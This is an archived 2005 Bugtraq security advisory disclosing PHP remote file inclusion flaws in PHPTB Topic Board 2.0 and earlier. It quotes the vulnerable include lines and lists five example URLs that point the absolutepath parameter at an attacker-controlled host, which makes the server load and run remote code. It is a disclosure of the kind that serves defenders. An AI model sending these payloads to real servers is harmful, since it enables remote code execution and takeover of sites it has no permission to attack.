lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 17 Aug 2005 10:14:39 -0000 From: goszynskif@...il.com To: bugtraq@...urityfocus.com Subject: PHPTB Topic Board <= 20: Multiple PHP injection vulnerabilities -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: PHPTB Topic Board - Multiple PHP injection vulnerabilities Version <= 2.0 Homepage: htt://www.phptb.com/ Author: Filip Groszyński (VXSfx) Date: 17 August 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Background: PHPTB Topic Borad is an open source portal system. However, an input validation flaw can cause malicious attackers to remote code execution on the web server. -------------------------------------------------------- Vulnerable code exist in ./classes/admin_o.php, ./classes/board_o.php, ./classes/dev_o.php, ./classes/file_o.php and ./classes/tech_o.php: <?php include $absolutepath.'classes/smart_o.php'; ... EOF Over that I found vulnerable code in ./classes/dev_o.php and ./classes/tech_o.php: ... require $GLOBALS['absolutepath'].'userpass.php'; ... EOF -------------------------------------------------------- Examples: http://[victim]/[dir]/classes/admin_o.php?absolutepath=http://[hacker_box]/ http://[victim]/[dir]/classes/board_o.php?absolutepath=http://[hacker_box]/ http://[victim]/[dir]/classes/dev_o.php?absolutepath=http://[hacker_box]/ http://[victim]/[dir]/classes/file_o.php?absolutepath=http://[hacker_box]/ http://[victim]/[dir]/classes/tech_o.php?absolutepath=http://[hacker_box]/ -------------------------------------------------------- Contact: Author: Filip Groszynski (VXSfx) Location: Poland <Warsaw> Email: groszynskif gmail com -- == -- == -- == -- == -- == -- == -- == -- == -- == --
Powered by blists - more mailing lists